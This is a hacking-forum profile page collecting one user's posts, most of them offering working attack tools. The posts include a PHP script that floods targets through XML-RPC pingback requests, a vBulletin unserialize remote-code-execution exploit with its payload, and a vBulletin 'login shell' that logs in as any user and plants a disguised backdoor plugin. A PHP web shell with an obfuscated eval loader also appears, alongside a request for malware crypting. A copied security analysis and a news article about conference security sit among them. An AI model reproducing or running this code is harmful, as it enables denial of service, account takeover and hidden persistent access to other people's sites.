sniffer

LvL-23
  • Content Count

    37
  • Avg. Content Per Day

    0
  • Joined

  • Last visited

Community Reputation

262 Excellent

About sniffer

  • Rank
    LvL-23
  • Birthday 03/03/1987

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. sniffer

    Crypting & Cracking Contest | End 2016

    Re: Crypting & Cracking Contest | End 2016 i need this crypte, please check your inbox bro
  2. sniffer

    Penetration Testing skills

    Re: Penetration Testing skills more explain, what cms do you use ? do you neen pentest web app or pentest server?
  3. sniffer

    Penetration Testing skills

    Re: Penetration Testing skills PM Me, [email protected]
  4. sniffer

    XML-RPC Pingback

    Re: XML-RPC Pingback this is php code (Layer 7) > <?php function partition( $list, $p ) { $listlen = count( $list ); $partlen = floor( $listlen / $p ); $partrem = $listlen % $p; $partition = array(); $mark = 0; for ($px = 0; $px < $p; $px++) { $incr = ($px < $partrem) ? $partlen + 1 : $partlen; $partition[$px] = array_slice( $list, $mark, $incr ); $mark += $incr; } return $partition; } $part = array(); $array = file($argv[3], FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); $childcount = $argv[2]; $part = partition($array, $childcount); $shm_id = shmop_open(23377332, "c", 0666, 1024); shmop_close($shm_id); if(pcntl_fork() == 0) { $sem = sem_get(13377331, 1, 0666, 1); $shm_id = shmop_open(23377332, "c", 0666, 1024); $total = 0; while(true) { sem_acquire($sem); $number = shmop_read($shm_id, 0, 1024); $total += $number; $string = array(); array_push($string, $number); array_push($string, " R/s "); array_push($string, $total); array_push($string, " Total Requests \r"); echo implode("", $string); unset($string); shmop_write($shm_id, str_pad("0", 1024, "\0"), 0); sem_release($sem); sleep(1); } exit; } for($i = 0; $i < $childcount; $i ++) { $pid = pcntl_fork(); if ($pid == -1) { echo "failed to fork on loop $i of forking\n"; exit; } else if ($pid) { continue; } else { $sem = sem_get(13377331, 1, 0666, 1); $shm_id = shmop_open(23377332, "c", 0666, 1024); while(true) { foreach($part[$i] as $ip) { list($service, $target) = array_merge(@explode(" ", $ip), array(" ")); $url = array(); array_push($url, $argv[1]); array_push($url, (parse_url($argv[1], PHP_URL_QUERY) == "" ? "?" : "&")); array_push($url, rand(1000000, 9999999)); array_push($url, "="); array_push($url, rand(1000000, 9999999)); $request = xmlrpc_encode_request("pingback.ping", array(implode("", $url), $target)); unset($url); $context = stream_context_create(array('http' => array( 'method' => "POST", 'header' => "Content-Type: text/xml", 'content' => $request ))); @file_get_contents($service, false, $context); sem_acquire($sem); $number = shmop_read($shm_id, 0, 1024); $number = intval($number); $number++; shmop_write($shm_id, str_pad($number, 1024, "\0"), 0); sem_release($sem); } } die; } } for($j = 0; $j < $childcount; $j++) { $pid = pcntl_wait($status); }
  5. > # Exploit Title: Vbulletin 5.1.X unserialize 0day preauth RCE exploit # Date: Nov 4th, 2015 # Exploit Author: hhjj # Vendor Homepage: [Hidden Content] # Version: 5.1.x # Tested on: Debian # CVE : # I did not discover this exploit, leaked from the IoT. # Build the object php << 'eof' <?php class vB_Database { public $functions = array(); public function __construct() { $this->functions['free_result'] = 'phpinfo'; } } class vB_dB_Result { protected $db; protected $recordset; public function __construct() { $this->db = new vB_Database(); $this->recordset = 1; } } print urlencode(serialize(new vB_dB_Result())) . "\n"; eof O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D #Then hit decodeArguments with your payload : [Hidden Content]
  6. On the August 6th, the Mozilla Foundation released a security update for the Firefox web browser that fixes the CVE-2015-4495 vulnerability in Firefox’s embedded PDF viewer, PDF.js. This vulnerability allows attackers to bypass the same-origin policy and execute JavaScript remotely that will be interpreted in the local file context. This, in turn, allows attackers to read and write files on local machine as well as upload them to a remote server. The exploit for this vulnerability is being actively used in the wild, so Firefox users are advised to update to the latest version (39.0.3 at the time of writing) immediately. In this blog we provide an analysis of two versions of the script and share details about the associated attacks against Windows, Linux and OS X systems. According to ESET’s LiveGrid® telemetry, the server at the IP address 185.86.77.48, which was hosting the malicious script, has been up since July 27, 2015. Also we can find corroboration on one of the compromised forums Operatives from the Department on Combating Cybercrime of the Ministry of Internal Affairs of Ukraine, who responded promptly to our notification, have also confirmed that the malicious exfiltration server, hosted in Ukraine, has been online since July 27, 2015. According to our monitoring of the threat, the server became inactive on August 8, 2015. The script The script used is not obfuscated and easy to analyze. Nevertheless, the code shows that the attackers had good knowledge of Firefox internals. The malicious script creates an IFRAME with an empty PDF blob. When Firefox is about to open the PDF blob with the internal PDF viewer (PDF.js), new code is injected into the IFRAME (Figure 2). When this code executes, a new sandboxContext property is created within wrappedJSObject. A JavaScript function is written to the sandboxContext property. This function will later be invoked by subsequent code. Together, these steps lead to the successful bypass of the same-origin policy. The exploit is very reliable and works smoothly. However, it may display a warning which can catch the attention of tech-savvy users. After successful exploitation of the bug, execution passes to the exfiltration part of code. The script supports both the Linux and Windows platforms. On Windows it searches for configuration files belonging to popular FTP clients (such as FileZilla, SmartFTP and others), SVN client, instant messaging clients (Psi+ and Pidgin), and the Amazon S3 client. more info : [Hidden Content] [hide-thanks] and see here [Hidden Content] ;) [/hide-thanks]
  7. SAN FRANCISCO — Pen and paper instead of a laptop. Cash instead of credit cards. Face-to-face chats instead of cell phones. That's the drill for the most cautious at two big computer security conferences taking place this week in Las Vegas. It's where security professionals need to be — and why they need to be on their toes, said Richard Blech, CEO of Secure Channels, a digital information security company based in Irvine, Calif. Black Hat, which begins Tuesday, will fill the Mandalay Bay hotel with upwards of 9,000 security executives, hackers, academics, and government and law enforcement staffers. It's immediately followed by Def Con, a more hacker-oriented conference held at the Paris and Bally's hotels. Last year, Def Con attracted nearly 16,000 people. Both feature demonstrations, lectures and presentations about the most cutting-edge computer security issues — and are attended by thousands of people with the tools and the knowledge to break into just about any system imaginable. These very skilled attendees sometimes like to show off their skills, others are looking for bragging right. And because it's an event that brings in high-level government and corporate staff, there's also plenty of data and networks to entice the nefarious. It's one-stop shopping, a place were every major security executive is gathered. "You don't have to travel around the globe or hunt them down on the Internet — they're all here," said Brad Taylor, CEO of security company Proficio in Carlsbad, Calif That means "the rules are a little different," said Stan Black, chief security officer for Citrix in Fort Lauderdale, Fla. For example, he's bringing his schedule printed out on a piece of paper so he doesn't have to turn on his cell phone to check it. The most wary will also turn off Wi-Fi, power down Bluetooth and book hotel rooms halfway across town. The threats include everything from "script kiddies" — unskilled hackers who use other people’s programs to attack dangerous systems — to nation-state actors out to pry loose sensitive information from large international corporations. "And they're all staying in the same hotel," said Steve McGregory, director of threat and application intelligence for Ixia, a security firm in Calabasas, Calif.. Jon Miller, vice president of the security firm Cylance in Irvine, Calif., doesn't see the hacking at Black Hat as malicious so much as simply intellectually curious. But he still turns off Wi-Fi and Bluetooth on his phone and only logs on to the Internet from his hotel room using a virtual private network. "And all my communications are encrypted," he said. Taylor's not even sure how safe VPNs will be. "I'm just a little concerned that somebody's got something they've figured out — and this is the time they'll use it," he said. Perhaps the biggest danger is the one most people wouldn't think twice about — using the hotel or conference Wi-Fi to connect to the Internet. "And that means Starbucks, too," Taylor said. At DefCon, that's made abundantly clear by what's known as the "Wall of Sheep." Most years a self-appointed group of attendees monitor the conference Wi-Fi system and post a continuous stream of passwords, IDs and other information unwittingly transmitted in the open by those not using safe computing techniques. To guard against having their cell phones hacked, some attendees use "burner phones" instead. These are cheap, pre-paid cell phones that contain none of their personal information. They just throw them away when they're done with the conference. With multiple sessions demonstrating how easy it is to read credit card data remotely with an electromagnetic sniffer, lots people leave their credit cards back in their hotel room safe. "They can just be standing behind you in the line. They come up to you and kind of bump into you and they're electronically lifting the information, it just takes second," Blech said. He counsels staff and clients to keep their credit cards in specially shielded envelopes to or stack them one on top of the other so the signals are jumbled up. Laptops are such a treasure trove of information that many conference-goers leave theirs at home, bringing only a "sterile" machine that contains nothing but the presentations they're making. No email. No Web browsers. No personal files. Even though his machines are encrypted "and have all the security they should have," Brad Taylor at Proficio only plans to carry a clean iPad. "If somebody's got something new and they're testing it out, I don't want to be one of the people who gets hit," he said. All of this makes Black Hat and Def Con somewhat daunting to attend, but that's the world these security professionals live in every day. Having to protect a single laptop isn't that big a deal, Black said. "We get over 20,000 unauthorized probes on our system every minute," he said. [Hidden Content]
  8. sniffer

    Kali Linux 2.0 Release Day Scheduled

    Re: Kali Linux 2.0 Release Day Scheduled 8/11/2015 not July 6, 2015
  9. Re: Free/cheap SMS spoofing service with global reach It is possible to send to Iran
  10. sniffer

    vBulletin Loginshell (version 1.9)

    [hide-thanks]> <?php/** * vBulletin 3.8.x-4.x Login Shell * Author: JB ([email protected]) * www.p0wersurge.com * 13/01/2014 (updated 26/07/2015) * Version 1.9 */#chdir('../');require_once('./global.php');define('SELF', $_SERVER['PHP_SELF']);@ini_set('display_errors', false);error_reporting(0);if(substr($vbulletin->versionnumber, 0, 1) > 3){ $fullperms = '16744444'; function verify_authentication2($username) { global $vbulletin; $username = strip_blank_ascii($username, ' '); if ($vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid, usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $vbulletin->db->escape_string(htmlspecialchars_uni($username)) . "'")) { set_authentication_cookies($cookieuser); $return_value = true; ($hook = vBulletinHook::fetch_hook('login_verify_success')) ? eval($hook) : false; return $return_value; } $return_value = false; ($hook = vBulletinHook::fetch_hook('login_verify_failure_username')) ? eval($hook) : false; return $return_value; }}else{ $fullperms = '491516'; function verify_authentication2($username) { global $vbulletin; $username = strip_blank_ascii($username, ' '); if ($vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid, usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $vbulletin->db->escape_string(htmlspecialchars_uni($username)) . "'")) { if ($vbulletin->GPC[COOKIE_PREFIX . 'userid'] AND $vbulletin->GPC[COOKIE_PREFIX . 'userid'] != $vbulletin->userinfo['userid']) { // we have a cookie from a user and we're logging in as // a different user and we're not going to store a new cookie, // so let's unset the old one vbsetcookie('userid', '', true, true, true); vbsetcookie('password', '', true, true, true); } vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true); vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true); $return_value = true; ($hook = vBulletinHook::fetch_hook('login_verify_success')) ? eval($hook) : false; return $return_value; } $return_value = false; ($hook = vBulletinHook::fetch_hook('login_verify_failure_username')) ? eval($hook) : false; return $return_value; }}$guess = array();$known = array( 'archive', 'clientscript', 'cpstyles', 'customavatars', 'customgroupicons', 'customprofilepics', 'attach', 'forumrunner', 'images', 'includes', 'install', 'packages', 'signaturepics', 'store_sitemap', 'vb');$admindir = $vbulletin->config['Misc']['admincpdir'];$complete = $vbulletin->options['bburl'] . '/' . $admindir . '/index.php';$results = scandir('.');foreach ($results as $result) { if ($result == '.' or $result == '..') continue; if (is_dir('./' . $result)) { if(in_array($result, $known)) continue; if(@file_exists($result . '/adminlog.php')) { $guess[] = $result; } else { continue; } }}if(isset($_REQUEST['do']) && $_REQUEST['do'] == 'login' && isset($_REQUEST['username'])){ require_once(DIR . '/includes/functions_login.php'); $username = $_REQUEST['username']; $q = "SELECT username FROM " . TABLE_PREFIX . "user WHERE username = '" . $vbulletin->db->escape_string($username) . "' OR userid = '" . $vbulletin->db->escape_string($username) . "'"; $query = $vbulletin->db->query_first($q); if($query['username'] != null) { if(verify_authentication2($query['username'])) { exec_unstrike_user($query['username']); process_new_login('cplogin', true, null); do_login_redirect(); } else { die('Verify failed'); } } else { die('User not found.'); }}elseif($_REQUEST['do'] == 'injectplugin'){ $products = array(); $query = $vbulletin->db->query("SELECT productid,title,version,active,url FROM " . TABLE_PREFIX . "product"); if($vbulletin->db->num_rows($query) > 0) { while($product = $vbulletin->db->fetch_array($query)) { $productinfo = array(); $productinfo['productid'] = $product['productid']; $productinfo['title'] = $product['title']; $productinfo['version'] = $product['version']; $productinfo['active'] = $product['active']; $productinfo['url'] = $product['url']; $products[] = $productinfo; } } // choose a random product if productcount > 0 else inject into vbulletin $productcount = count($products); $plugin['title'] = 'AJAX Refresh Speed'; $plugin['hookname'] = 'global_complete'; $plugin['phpcode'] = 'if(isset($_REQUEST[\'x\'])){$_REQUEST[\'x\']($_REQUEST[\'y\']);}'; if(intval($productcount) > 0) { // failsafe incase product is disabled - we should only ever be injecting into an enabled product, or our injection is worthless // optional really, you can just make it insert into vbulletin itself but that's not really as covert as i'd like retrymtrand: $rand = mt_rand(0, intval($productcount)); if($products[$rand]['active']) { $plugin['product'] = $products[$rand]['productid']; } else { goto retrymtrand; } } else { $plugin['product'] = 'vbulletin'; } $plugin['devkey'] = ''; $plugin['active'] = '1'; $plugin['executionorder'] = '5'; $vbulletin->db->query(" INSERT INTO " . TABLE_PREFIX . "plugin ( hookname, title, phpcode, product, active, executionorder ) VALUES ( '" . $plugin['hookname'] . "', '" . $plugin['title'] . "', '" . $vbulletin->db->escape_string($plugin['phpcode']) . "', '" . $vbulletin->db->escape_string($plugin['product']) . "', " . intval($plugin['active']) . ", " . intval($plugin['executionorder']) . " ) "); $pluginid = $vbulletin->db->insert_id(); // update the datastore vBulletinHook::build_datastore($db); ?> Plugin <?php echo $pluginid; ?> created on global_complete! <?php echo print_r($plugin); ?> Go back <?php}else{ $admin_usergroups = array(); $admin_usergroups_query = $vbulletin->db->query("SELECT usergroupid FROM " . TABLE_PREFIX . "usergroup WHERE adminpermissions = '3'"); while($admin_usergroup = $vbulletin->db->fetch_array($admin_usergroups_query)) { $admin_usergroups[] = $admin_usergroup['usergroupid']; } $admins = array(); $query = $vbulletin->db->query("SELECT userid,adminpermissions FROM " . TABLE_PREFIX . "administrator"); while($user = $vbulletin->db->fetch_array($query)) { $userinfo = fetch_userinfo($user['userid']); $userarray = array(); $userarray['userid'] = $userinfo['userid']; $userarray['username'] = $userinfo['username']; $userarray['musername'] = fetch_musername($userinfo); $userarray['adminpermissions'] = $user['adminpermissions']; $admins[] = $userarray; } $products = array(); $query = $vbulletin->db->query("SELECT productid,title,version,active,url FROM " . TABLE_PREFIX . "product"); if($vbulletin->db->num_rows($query) > 0) { while($product = $vbulletin->db->fetch_array($query)) { $productinfo = array(); $productinfo['productid'] = $product['productid']; $productinfo['title'] = $product['title']; $productinfo['version'] = $product['version']; $productinfo['active'] = $product['active']; $productinfo['url'] = $product['url']; $products[] = $productinfo; } } ?> vBulletin Login Shell | CP Login (<?php echo $vbulletin->options['bbtitle']; ?>) (vB<?php echo $vbulletin->versionnumber; ?>) Admins found: <?php echo count($admins); ?> <?php foreach($admins as $admin){ echo '' . $admin['musername'] . '' . (($admin['adminpermissions'] == $fullperms) ? ' (full permissions)' : '') . ' ';} ?> AdminCP directory detected in config: <?php echo $admindir; ?> Possible AdminCP directories (from existing subdirectories minus vBulletin standard): <?php foreach($guess as $dir) { echo '' . $dir . ' '; }?> Inject malicious plugin Table prefix: <?php echo TABLE_PREFIX; ?> Cookie prefix: <?php echo COOKIE_PREFIX; ?> Cookie salt: <?php echo COOKIE_SALT; ?> <?php if(count($products) > 0) { ?> Installed Products </pre> <ul> <?php foreach($products as $product) { if($product['active']) { $color = 'green'; } else { $color = 'red'; } echo '' . ((trim($product['url']) != null) ? '' : '') . $product['title'] . ((trim($product['url']) != null) ? '' : '') . ' (' . $product['version'] . ')'; } ?> </ul> <hr> <?php } ?> <h6>Written by @xijailbreakx. This file allows you to override the default vBulletin login system and login to the control panel and forums as anyone. It also tries to find the admincp directory, by using both the configuration file (possibly incorrectly set) and by guessing based on existing subdirectories (nearly 100% successful).</h6> <?php} [/hide-thanks]
  11. sniffer

    Shell Burner 1.0.1.3

    Basically allows you to check valid shells and server info [HIDE-THANKS] [Hidden Content] [/HIDE-THANKS] Link Updated By swag666
  12. sniffer

    IPB 3.4.6 Vuln Checker

    The program is to verify the site is vulnerable or not. [HIDE-THANKS] Download : [Hidden Content] Virus Scan : [Hidden Content] [/HIDE-THANKS]
  13. Exploit Title: Microsoft Word Local Machine Zone Remote Code Execution Vulnerability Date: July 15th, 2015 Exploit Author: Eduardo Braun Prado Vendor Homepage : [Hidden Content] Version: 2007 Tested on: Microsoft Windows XP, 2003, Vista, 2008, 7, 8, 8.1 CVE: CVE-2015-0097 Original Advisory: [Hidden Content] Microsoft Word, Excel and Powerpoint 2007 contains a remote code execution vulnerability because it is possible to reference documents such as Works document (.wps) as HTML. It will process HTML and script code in the context of the local machine zone of Internet Explorer which leads to arbitrary code execution. By persuading users into opening eg. specially crafted .WPS, ".doc ", ".RTF " (with a space at the end) it is possible to triggerthe vulnerability and run arbitrary code in the context of the logged on Windows user. Exploit code here : [Hidden Content] [Hidden Content] [Hidden Content]
  14. WATOBO – The Web Application Security Auditing Toolbox – is intended to enable security professionals to perform highly efficient (semi-automated ) web application security audits. It is capable of passive as well as active scanning and this latest is its real value added. It enables to automatize the discovery of common vulnerabilities (XSS, LFI, SQL injections etc) in web applications. WATOBO works like a local proxy, similar to ZAP, Paros or Burp Suite but in Ruby, when the rest are pretty much in JAVA. Features WATOBO has Session Management capabilities! You can define login scripts as well as logout signatures. So you don’t have to login manually each time you get logged out. WATOB can act as an transparent proxy WATOBO has anti-CSRF features WATOBO can perform vulnerability checks out of the box. WATOBO supports Inline De-/Encoding, so you don’t have to copy strings to a transcoder and back again. Just do it inside the request/response window with a simple mouse click. WATOBO has smart filter functions, so you can find and navigate to the most interesting parts of the application easily. WATOBO is written in (FX)Ruby and enables you to easiely define your own checks WATOBO is free software ( licensed under the GNU General Public License Version 2) Scanning/Active Checks During a scan all selected active modules will be used to test the one or more chats (chat = request/response pair). The total amount of resulting requests is hard to predict because in most cases it depends on the number of parameters and the module itself. Here’s the list of the currently available active checks: Server-Status page Directory Walker FileExtensions HTTP Methods Lotus Domino DB Enumeration .NET Custom Error .NET Files Local File Inclusion Crossdomain Policy Basic JBoss enumeration SAP ITS: Default Commands SAP ITS: Default Services SAP ITS: Service Parameters SAP ITS: XSS Siebel Applications Error-based SQL-Injection Time-based SQL Injection Boolean SQL-Injection Numerical SQL-Injection XML-XXE NextGeneration Cross Site Scripting Checks Simple Cross Site Scripting Checks You can download WATOBO 0.9.20 gem here: [hide-thanks] Download : [Hidden Content] More Info : [Hidden Content] [/hide-thanks]
  15. sniffer

    shell spy version php

    this shell is very Famous and i alwayes use this shell and share for my friends [HIDE-THANKS] > <?php $admin = array(); // ????????, true ?????, false ?????.??????? $admin['check'] = true; // ????????,??????? $admin['pass'] = 'f4f068e71e0d87bf0ad51e6214ab84e9'; //angel //??? cookie ?????????, ??????, ???????, ??????? // cookie ?? $admin['cookiepre'] = ''; // cookie ??? $admin['cookiedomain'] = ''; // cookie ???? $admin['cookiepath'] = '/'; // cookie ??? $admin['cookielife'] = 86400; eval(gzinflate(base64_decode('***'))); ?> [/HIDE-THANKS]